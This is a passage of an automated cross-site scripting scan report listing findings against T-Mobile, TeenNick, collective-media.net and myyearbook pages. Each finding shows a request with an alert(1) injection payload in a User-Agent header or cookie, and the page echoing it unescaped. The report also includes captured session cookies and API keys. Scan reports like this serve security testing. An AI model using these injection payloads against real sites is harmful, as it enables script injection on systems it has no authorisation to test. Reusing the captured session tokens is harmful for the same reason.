TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a27+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:27 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:27 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:27 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:27 GMT
Connection: close
Content-Length: 46817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7dc32'-alert(1)-'57fd293ebfe');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.261. http://www.t-mobile.com/shop/plans/Cell-Phone-Plans-Overview.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/plans/Cell-Phone-Plans-Overview.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85450'-alert(1)-'876585b7636 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/plans/Cell-Phone-Plans-Overview.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)85450'-alert(1)-'876585b7636
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a22+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:22 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:22 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:22 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:22 GMT
Connection: close
Content-Length: 46817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)85450'-alert(1)-'876585b7636');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.262. http://www.t-mobile.com/shop/plans/Cell-Phone-Plans.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/plans/Cell-Phone-Plans.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99901'-alert(1)-'ad9dec94ded was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/plans/Cell-Phone-Plans.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)99901'-alert(1)-'ad9dec94ded
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a49+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:49 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:49 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:49 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:48 GMT
Connection: close
Content-Length: 46817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)99901'-alert(1)-'ad9dec94ded');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.263. http://www.t-mobile.com/shop/plans/Prepaid-Plans-Overview.aspx [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.t-mobile.com
Path:	/shop/plans/Prepaid-Plans-Overview.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20a29'-alert(1)-'4f7d4d0e211 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/plans/Prepaid-Plans-Overview.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)20a29'-alert(1)-'4f7d4d0e211
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; fsr.s={"v":1,"rid":"1300628812323_364495","ru":"http://burp/show/20","r":"burp","st":"","pv":2,"to":5,"c":"http://www.t-mobile.com/shop/phones/Default.aspx","lc":{"d4":{"v":2,"s":false}},"cd":4,"sd":4,"f":1300628818187}; TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; PartnerExpiration=; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; 53643872-SKEY=4772067767537568202; fsr.a=1300628846480; TMobileCommon=TeaId=d676b058-7b88-48e0-a1a7-a54f7fb0806d; TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; TMobilePartner=; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; HumanClickSiteContainerID_53643872=STANDALONE; cmTPSet=Y; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; ASP.NET_SessionId=qquvpt55xmlorbb04afdz055; TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: PartnerExpiration=PARTNER=!4%2f3%2f2011+2%3a01%3a21+PM; domain=.t-mobile.com; expires=Tue, 20-Mar-2012 14:01:21 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:21 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Mon, 20-Mar-2006 14:01:21 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=&ZIPISVALID=True&UCCID=U&SessionId=8e375ee9-b73b-43f6-8b5e-aba1334ba862; domain=.t-mobile.com; path=/
Date: Sun, 20 Mar 2011 14:01:20 GMT
Connection: close
Content-Length: 68069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)20a29'-alert(1)-'4f7d4d0e211');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.264. http://www.teennick.com/ntv/shows/index.php [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.teennick.com
Path:	/ntv/shows/index.php

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f2f5"-alert(1)-"fe8fbdebc5d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ntv/shows/index.php HTTP/1.1
Host: www.teennick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8f2f5"-alert(1)-"fe8fbdebc5d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 39429
Content-Type: text/html;charset=UTF-8
Set-Cookie: ak-mobile-detected=no; expires=Sun, 20-Mar-2011 20:01:10 GMT; path=/
Set-Cookie: NICK-OS=WIN
Content-Language: en
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sun, 20 Mar 2011 14:01:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>The Nightlife Videos, Cast, & Pictures | The Nightlife|
...[SNIP]...
<![CDATA[ */
           if(typeof ESI === "undefined" || !ESI) var ESI = {};
           ESI.countryCode = "US";
           ESI.timezone = "EST";
           ESI.os = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8f2f5"-alert(1)-"fe8fbdebc5d";
       /* ]]>
...[SNIP]...

1.265. http://www.teennick.com/shows/the-nightlife [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.teennick.com
Path:	/shows/the-nightlife

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4bc8"-alert(1)-"bdc8b6d4e51 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shows/the-nightlife HTTP/1.1
Host: www.teennick.com
Proxy-Connection: keep-alive
Referer: http://burp/show/21
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16d4bc8"-alert(1)-"bdc8b6d4e51
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html;charset=UTF-8
Set-Cookie: NICK-OS=WIN
Content-Language: en
Vary: User-Agent
Vary: Accept-Encoding
Cache-Control: max-age=1200
Date: Sun, 20 Mar 2011 14:04:59 GMT
Connection: close
Content-Length: 39499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>The Nightlife Videos, Cast, & Pictures | The Nightlife|
...[SNIP]...
) var ESI = {};
           ESI.countryCode = "US";
           ESI.timezone = "EST";
           ESI.os = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16d4bc8"-alert(1)-"bdc8b6d4e51";
       /* ]]>
...[SNIP]...

1.266. http://k.collective-media.net/cmadj/cm.mtv/games_010111 [cli cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/games_010111

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3c01"%3balert(1)//1a875a1618b was submitted in the cli cookie. This input was echoed as d3c01";alert(1)//1a875a1618b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cmadj/cm.mtv/games_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=595575;cmpgurl=? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7d3c01"%3balert(1)//1a875a1618b; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; dc=dc-dal-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 20 Mar 2011 12:34:30 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 21-Mar-2011 12:34:30 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Mon, 21-Mar-2011 12:34:30 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sun, 27-Mar-2011 12:34:30 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 20-Mar-2011 20:34:30 GMT
Content-Length: 8021

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11e4f07c0988ac7d3c01";alert(1)//1a875a1618b&seg_code=am.bk&ord=1300624470",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

1.267. http://www.myyearbook.com/ [mybRegTheme cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/

Issue detail

The value of the mybRegTheme cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1979b</script><script>alert(1)</script>5438cda2d88 was submitted in the mybRegTheme cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?mysession=cmVnaXN0cmF0aW9uX3JlZ2lzdHJhdGlvbiZyZWZlcnJlcj0wJm9sZD0xJmxvZ2luX2ZhaWx1cmU9dHJ1ZSZlbWFpbElkPWVtYWls HTTP/1.1
Host: www.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl1979b</script><script>alert(1)</script>5438cda2d88; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __g_c=w%3A1%7Cb%3A2%7Cc%3A301947237237767%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=301947237237767_1_0.01_0_5_1301056485872; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:36:26 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mcim=deleted; expires=Sat, 20-Mar-2010 13:36:25 GMT; path=/; domain=.myyearbook.com
Set-Cookie: meeboCIM672=deleted; expires=Sat, 20-Mar-2010 13:36:25 GMT; path=/; domain=.myyearbook.com
Set-Cookie: _mybUtype=deleted; expires=Sat, 20-Mar-2010 13:36:25 GMT; path=/; domain=.myyearbook.com
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP COR CURa OUR STP UNI"
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.20.154
Content-Length: 11906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>myYearbook </title>
<meta name="description" content="Mee
...[SNIP]...
function() { urchinTracker( '/myb/registration/registrationSubmit' ); } );} );RECAPTCHA_KEY = '6LerRQMAAAAAAFSmYOky23chuQ2UL8Jszx9fUajS';HOME_URL = 'http://home.myyearbook.com/';Connect.setService("hbl1979b</script><script>alert(1)</script>5438cda2d88");Connect.connectService = 'Facebook';Connect.setConfig({"allowClose":false,"allowLoginClose":true,"allowRegistrationClose":true,"Facebook":{"apiKey":"07f8ef39cb859529fdc0710fce18d887","applicationId"
...[SNIP]...

Report generated by XSS.CX at Sun Mar 20 09:24:33 CDT 2011.